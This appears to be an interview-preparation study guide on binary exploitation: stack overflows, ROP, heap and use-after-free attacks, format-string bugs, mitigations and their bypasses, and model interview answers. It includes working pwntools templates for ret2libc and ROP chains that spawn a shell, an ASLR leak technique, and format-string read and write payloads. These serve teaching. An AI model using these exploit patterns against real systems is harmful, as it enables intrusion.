Memory Corruption & Binary Exploitation
Breadth layernotes-security-core-knowledge.md
Memory Layout
High addresses ┌─────────────────────────┐ │ Stack │ ← grows downward; local vars, return addresses │ ↓ │ │ (unmapped gap) │ │ ↑ │ │ Heap │ ← grows upward; malloc'd data │ .bss │ uninitialised globals │ .data │ initialised globals │ .text │ executable code (read-only) │ ELF/PE headers │ └─────────────────────────┘ Low addresses
Stack frame layout (x86-64, function call)
┌──────────────────────┐ ← high address │ caller's stack frame│ │───────────────────────── │ return address │ ← overwrite this to hijack execution │ saved RBP │ │ local variable 1 │ │ local variable 2 │ │ char buf[64] │ ← overflow starts here, writes upward └──────────────────────┘ ← low address / top of stack (RSP)
Stack Buffer Overflows
How It Works
#include <string.h>
void vulnerable(char *input) {
char buf[64];
strcpy(buf, input); // no length check — overflows if input > 64 bytes
}
// If input = 64 bytes of padding + 8 bytes (overwrite saved RBP) + 8 bytes (new return address)
// → function returns to attacker-controlled addressExploitation Steps (no mitigations)
Find the offset to the return address
python# Generate cyclic pattern to identify exact offset from pwn import * pattern = cyclic(200) # send as input # On crash, read value of RIP/EIP → cyclic_find(crash_value) offset = cyclic_find(0x61616164) # → 64 bytesControl RIP/EIP — place return address at
offsetbytes in the payloadWhere to jump?
ret2shellcode(no NX): write shellcode to buffer, jump to it
ret2libc(NX present): jump to
system("/bin/sh")in libcret2plt/ ROP (ASLR + NX): chain gadgets to call
system()
ret2libc Example (32-bit, no ASLR)
from pwn import *
p = process('./vulnerable')
offset = 64 + 4 # buffer + saved EBP
# Addresses from gdb (no ASLR)
system_addr = 0xf7e3ada0 # address of system() in libc
exit_addr = 0xf7e30ec0 # address of exit() (clean exit after shell)
bin_sh_addr = 0xf7f5a0ac # address of "/bin/sh" string in libc
payload = b'A' * offset
payload += p32(system_addr) # return address → system()
payload += p32(exit_addr) # return address after system() → exit()
payload += p32(bin_sh_addr) # argument to system()
p.sendline(payload)
p.interactive()Return-Oriented Programming (ROP)
ROP chains gadgets — short sequences of instructions ending in RET — to execute arbitrary code without injecting shellcode. Bypasses NX/DEP.
Memory hookROP is "ransom-note code." NX/DEP says "you can't run your own code on the stack." ROP's answer: don't bring your own code — cut up the program's existing legitimate code into snippets and paste them together to spell a new message, like a ransom note assembled from magazine clippings. Each "gadget" is a few instructions ending in
RET, and theRETmakes the CPU jump to the next gadget address you've stacked up. Because every instruction is already in executable memory, NX never trips. Mnemonic: NX blocks new code, so ROP reuses old code. This arms-race framing (NX → ROP → CFI → ...) is exactly what mitigation interviews want.
Gadget = a sequence of instructions ending in RET
e.g. "pop rdi ; ret" (load value into RDI then return)
ROP chain = stack full of [gadget_addr][gadget_arg][gadget_addr][gadget_arg]...
each gadget executes, then RETs to the next address on the stackBuilding a ROP Chain (x86-64 Linux syscall)
Goal: execve("/bin/sh", NULL, NULL)
- syscall number 59 in RAX
- filename pointer in RDI
- argv pointer in RSI (NULL)
- envp pointer in RDX (NULL)
from pwn import *
elf = ELF('./vulnerable')
rop = ROP(elf)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# Find gadgets
pop_rdi = (rop.find_gadget(['pop rdi', 'ret']))[0]
pop_rsi = (rop.find_gadget(['pop rsi', 'pop r15', 'ret']))[0]
bin_sh = next(libc.search(b'/bin/sh'))
ret_gadget = (rop.find_gadget(['ret']))[0] # stack alignment for x86-64 ABI
payload = flat(
b'A' * offset,
ret_gadget, # 16-byte align the stack for system()
pop_rdi, bin_sh, # rdi = &"/bin/sh"
libc.sym['system'], # call system("/bin/sh")
)ROPgadget / ropper — Finding Gadgets
ROPgadget --binary vulnerable --rop | grep "pop rdi"
ropper --file vulnerable --search "pop rdi; ret"Heap Exploitation Basics
The heap is managed by malloc/free. Glibc's allocator (ptmalloc) uses chunks with metadata headers.
Chunk (in-use): ┌─────────────────┐ │ prev_size │ (only if prev chunk is free) │ size + flags │ ← P (prev in use), M (mmap'd), A (non-main arena) │ user data │ │ ... │ └─────────────────┘ Chunk (free): ┌─────────────────┐ │ prev_size │ │ size │ │ fd (fwd ptr) │ ← points to next free chunk in bin │ bk (bck ptr) │ ← points to prev free chunk in bin │ ... │ └─────────────────┘
Heap Overflow
Write past the end of a heap allocation and corrupt the next chunk's metadata or data.
Classic attack (older glibc)corrupt fd/bk pointers in a free chunk → trigger unlink → write arbitrary value to arbitrary address.
Modern heap attacksmore complex due to security checks in newer glibc. Focus areas for interviews:
corrupt tcache freelist to allocate from arbitrary addresses
overwrite top chunk size; cause next malloc to return attacker-controlled pointer
double-free to get duplicate allocations; use second to corrupt first's metadata
Use-After-Free (UAF)
Accessing a heap object after it's been freed.
char *buf = malloc(64);
strcpy(buf, "data");
free(buf); // buf freed; memory returned to allocator
// buf pointer is still valid (dangling pointer)
char *evil = malloc(64); // may receive the same allocation
strcpy(evil, "AAAA...EVIL"); // overwrite the freed buffer's contents
printf("%s\n", buf); // buf now points to attacker-controlled dataExploitation
- Reclaim the freed memory with a controlled allocation
- The old pointer now points to attacker-controlled data
- If the object is a vtable pointer / function pointer, achieve RCE
UAF is one of the most common browser vulnerabilities (Chrome V8, Firefox SpiderMonkey). Most exploit chains for browsers include a UAF step.
Format String Vulnerabilities
printf(user_input); // vulnerable: user controls format string
printf("%s", user_input); // safeWhy it's dangerous%x reads 4 bytes from the stack; %n writes the count of printed characters to a pointer argument.
printf("AAAA%x%x%x%x%x%x%x%n")
^^^^ ↑
marker to find writes to the address pointed to by the
position on stack next argument (which we control)Read Arbitrary Memory
# Find the offset where your input appears on the stack
"%x.%x.%x.%x.%x.%x" # keep adding %x until you see 0x41414141 (AAAA)
# Say it appears at position 7:
"%7$x" # direct parameter access — read 4 bytes at stack position 7
# Read from arbitrary address (e.g. 0x08049abc)
"\xbc\x9a\x04\x08%7$x" # place address on stack, then %7$x reads from itWrite Arbitrary Memory (%n)
# Write 4 to address 0x08049abc
"\xbc\x9a\x04\x08" + "%7$n" # %n writes number of chars printed so far
# To write 100: pad to 100 chars first:
"\xbc\x9a\x04\x08" + "%96x%7$n" # 4 (address bytes) + 96 padding = 100Modern mitigationsGCC's -Wformat-security warns at compile time; FORTIFY_SOURCE adds runtime checks on format string arguments.
Mitigations and Bypasses
| Mitigation | Protection | Bypass technique |
|---|---|---|
| Stack canary | Random value before return address; checked on return | Leak canary via format string or out-of-bounds read; or overwrite only return address if canary is elsewhere |
| ASLR | Randomises base addresses of stack, heap, libs | Leak a pointer to defeat ASLR (one leaked address reveals base); brute-force on 32-bit (only 2^16 positions); heap spraying |
| NX / DEP | Stack/heap marked non-executable | ROP chains (use existing executable code as gadgets) |
| PIE | Binary base address randomised | Leak binary address (e.g. via format string or UAF) |
| RELRO (Full) | GOT marked read-only | Can't overwrite GOT entries; attack other writable areas |
| CFI (Control Flow Integrity) | Restricts indirect calls to valid targets | Very hard to bypass; needs to find a valid target that gives useful primitives |
| Safe Stack (CET) | Hardware shadow stack for return addresses | Requires kernel/hardware support; rare in practice |
Memory hookthe mitigations are a layered relay, each defeating the last attack. Trace the arms race: canary (catches stack smashing → leak it), NX (no stack code → ROP), ASLR (randomize addresses → leak one pointer to recover the base), PIE (randomize the binary too → leak it), RELRO (lock the GOT → attack elsewhere), CFI/shadow-stack (validate jump/return targets → very hard). The recurring theme: almost every modern exploit needs an info leak first — a single leaked address unravels ASLR/PIE and turns "randomized" back into "known." So when asked "how do you exploit a hardened binary," the answer starts with "first I find an information leak," then ROP. The defender's flip side: a memory-disclosure bug is as dangerous as a write bug because it's the key that unlocks the others.
Defeating ASLR with an Info Leak
- Find a vulnerability that reads memory (format string, out-of-bounds read, UAF)
- Read a pointer to a known library or the binary itself
- Subtract the known offset of that symbol → get the randomised base address
- Calculate all needed gadget/symbol addresses using the leaked base
# Example: leak libc address from printf's GOT entry
leaked_addr = u64(p.recv(8))
libc.address = leaked_addr - libc.sym['printf']
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.sym['system']Exploitation Tools
pwntools — Python exploit development framework. Process interaction, ROP chains, packing, GDB integration.
pythonfrom pwn import * p = process('./vuln') # or remote('host', port) gdb.attach(p) # attach GDB for debuggingGDB + pwndbg / GEF — enhanced GDB for exploit dev.
pattern create,pattern search,checksec,vmmap,heap,rop.bashgdb ./vuln pwndbg> checksec # show all mitigations pwndbg> pattern create 200 pwndbg> run <<< $(python3 -c "print('A'*200)") pwndbg> pattern search $rspROPgadget — find ROP gadgets in binaries.
bashROPgadget --binary ./vuln --rop | grep "pop rdi"checksec — quick mitigation check.
bashchecksec --file=./vuln # Shows: Arch, RELRO, Stack Canary, NX, PIE, RPATH, RUNPATH, Symbols, FORTIFYGhidra / IDA Pro / Binary Ninja — reverse engineering; decompile binary to C-like pseudocode; find vulnerabilities in closed-source binaries.
AFL++ / libFuzzer — coverage-guided fuzzers; automatically find crashes in parsers and protocol handlers.
Interview Questions
A stack buffer overflow happens when a program writes more data into a fixed-size stack buffer than it can hold, and the excess spills into adjacent stack memory. Because the function's saved return address sits on the stack just past the local buffers, an attacker who controls the overflowing input can overwrite that return address. When the function finishes and executes its return, the CPU jumps to whatever address the attacker wrote instead of the legitimate caller — hijacking control flow. From there the attacker redirects execution to injected shellcode, to existing code like system() in libc, or to a ROP chain. The root cause is an unbounded copy like strcpy with no length check; the fix is bounds-checked operations plus mitigations like canaries.
Address Space Layout Randomization randomizes the base addresses of the stack, heap, libraries, and with PIE the executable itself, so an attacker can't hardcode the address of their shellcode or of a function like system. It defeats exploits that rely on knowing fixed addresses. An info leak defeats it because the randomization applies one base offset to a whole region — so if any vulnerability lets the attacker read a single pointer, say a libc address from the GOT or a stack leak, they subtract that symbol's known offset to recover the region's base, and then every other address in that region is computable. That's why modern exploitation almost always chains an information-disclosure bug to leak an address before delivering the control-flow hijack.
NX/DEP marks the stack and heap non-executable, so injected shellcode won't run. Return-Oriented Programming sidesteps this by not injecting any new code: instead it reuses short snippets of the program's existing executable code, called gadgets, each ending in a return instruction. The attacker fills the stack with a sequence of gadget addresses and data, and each gadget does a small operation then returns, popping the next gadget address off the stack — chaining them to, say, set up registers and call system or make a syscall. Because every instruction executed already lives in legitimate executable memory, NX is never violated. It's the answer to NX, which is why the next mitigation, control-flow integrity, targets ROP specifically.
A use-after-free occurs when a program frees a heap allocation but keeps and later uses a dangling pointer to that freed memory. It's exploitable because once memory is freed it can be reallocated, so an attacker arranges for a new object of their choosing to occupy the same memory. Now the stale pointer, still believed to point at the original object, actually points at attacker-controlled data. If the original object had, for example, a function pointer or vtable, the attacker controls where the program calls — leading to code execution; at minimum it can corrupt state or leak memory. UAFs are especially common and dangerous in C++ with virtual function tables and in browsers, which is why mitigations like heap isolation, MarkUS/MTE, and safer languages target them.
A stack canary is a random value the compiler places between the local buffers and the saved return address; before a function returns, it checks the canary is unchanged, and aborts if it isn't — so a linear buffer overflow that smashes the return address also clobbers the canary and gets caught. A format string vulnerability bypasses it because format strings give an information leak and an arbitrary write rather than a linear overflow. With a leak, the attacker uses %x or %p specifiers to read the canary value straight off the stack, then includes that exact value in their overflow so the check passes; alternatively %n lets them write directly to the return address without touching the canary at all. So the canary defends against contiguous overwrites, not against leak-and-replay or targeted writes.
PIE, Position-Independent Executable, means the program's own code and data are compiled to load at a randomized base address rather than a fixed one, extending ASLR to the binary itself. Without PIE, the executable's gadgets, functions, and GOT live at predictable addresses even when libraries are randomized, giving the attacker a reliable foothold. With PIE, the attacker can't assume any address in the binary either, so they need an info leak that discloses a binary address before they can locate gadgets or symbols within it. In practice it raises the bar by requiring a leak of the binary base in addition to, or instead of, a libc leak — which is why checking whether a target is PIE is one of the first things you do with checksec.
Control Flow Integrity constrains a program's indirect control transfers — indirect calls, jumps, and returns — so they can only go to legitimate, pre-computed targets, rather than anywhere an attacker redirects them. It mitigates the hijacking step that ROP and similar code-reuse attacks rely on: even if an attacker overwrites a return address or function pointer, CFI rejects the transfer unless it lands on a valid target, breaking arbitrary gadget chaining. Hardware forms like a shadow stack (Intel CET) protect return addresses by keeping a separate protected copy and comparing on return. CFI is hard to bypass, though not perfect — attackers look for valid targets that still yield useful primitives, or data-only attacks that don't divert control flow. It's the current front line against code reuse.
I start with reconnaissance: run checksec to see which mitigations are on — canary, NX, PIE, RELRO — because that dictates the whole strategy, and examine the binary statically in Ghidra and dynamically in GDB to find the vulnerability and understand the input handling. I confirm control of the instruction pointer, typically with a cyclic pattern to find the exact offset to the return address. Then I plan around the mitigations: if NX is on I'll use ROP rather than shellcode; if ASLR or PIE is on I first hunt for an information leak to recover the base addresses; with a canary I need to leak or avoid it. From the leak I compute gadget and symbol addresses, build the chain — commonly to call system("/bin/sh") or execve via a syscall — using pwntools and ROPgadget, and iterate under the debugger until it's reliable. The mental model is always: get IP control, defeat randomization with a leak, then redirect to a useful primitive.